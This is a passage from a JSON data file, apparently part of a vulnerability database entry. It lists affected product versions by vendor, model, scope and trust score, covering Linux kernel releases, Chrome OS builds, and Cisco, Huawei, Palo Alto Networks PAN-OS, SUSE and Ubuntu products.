      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.6"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.24"
      },
      {
        "model": "linux cloudlinuxos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cloud",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.66"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5(.1.131)"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.38"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "13.3"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1153.4"
      },
      {
        "model": "prime access registrar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.62"
      },
      {
        "model": "linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1122.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "moonshot",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.116"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.37"
      },
      {
        "model": "junos space 15.2r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.7"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.1"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "16.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.93"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1"
      },
      {
        "model": "onepk all-in-one virtual machine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux enterprise debuginfo sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.41"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.71"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.1"
      },
      {
        "model": "linux enterprise workstation extension sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "kernel 3.9-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.5"
      },
      {
        "model": "fusioncube v100r002c60spc100",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.21"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.6.1.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.7"
      },
      {
        "model": "vds-tv vault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloudengine v100r006c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "kernel 3.11-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.8"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1153.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "hsr6600 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1183.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.39"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.18"
      },
      {
        "model": "spa232d multi-line dect analog telephone adapter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "chrome os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.79"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.171"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.73"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.57"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.79"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.13"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.0.1"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.73"
      },
      {
        "model": "dcm series d990x digital content manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.156"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.10"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.3"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "opensuse",
        "version": "42.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.64"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "57007)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.58"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1192.2"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.33"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "junos space 14.1r1.9",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.14"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.154"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.25"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.6"
      },
      {
        "model": "linux enterprise server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.172"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "cloudengine v100r003c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "cloudengine v200r001sph002",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.14"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.43"
      },
      {
        "model": "vrealize operations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.152"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.18"
      },
      {
        "model": "kernel 3.11-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.7"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.61"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.8"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.403"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.44"
      },
      {
        "model": "kernel 4.4-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.10"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.0"
      },
      {
        "model": "vsr (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.152"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.73"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.65"
      },
      {
        "model": "ar3200 v200r006c13",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel 3.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.1"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59207)0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.7"
      },
      {
        "model": "smart net total care onprem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.54"
      },
      {
        "model": "update hotfix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "virtuozzo",
        "version": "6.011"
      },
      {
        "model": "cloudengine v100r005c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5"
      },
      {
        "model": "powerkvm update",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.1.3-6513"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0"
      },
      {
        "model": "spa112 2-port phone adapter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "junos space 16.1r1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.161"
      },
      {
        "model": "vrealize operations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.8"
      },
      {
        "model": "fusioncube v100r002c60rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.30"
      },
      {
        "model": "ar3200 v200r006c12",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.23"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.43"
      },
      {
        "model": "hsr6800 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.94"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "powerkvm update",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.3"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1185.0"
      },
      {
        "model": "manager proxy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.9"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.1.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.41"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.91"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.26"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.46"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.4"
      },
      {
        "model": "kernel 3.7-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "cloudengine v100r005c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.19"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.4"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.10.140.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.5"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.58"
      },
      {
        "model": "propel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.01"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.28"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.8"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.134.14"
      },
      {
        "model": "ata analog telephone adaptor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1870"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.10"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.76"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "expressway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.21"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
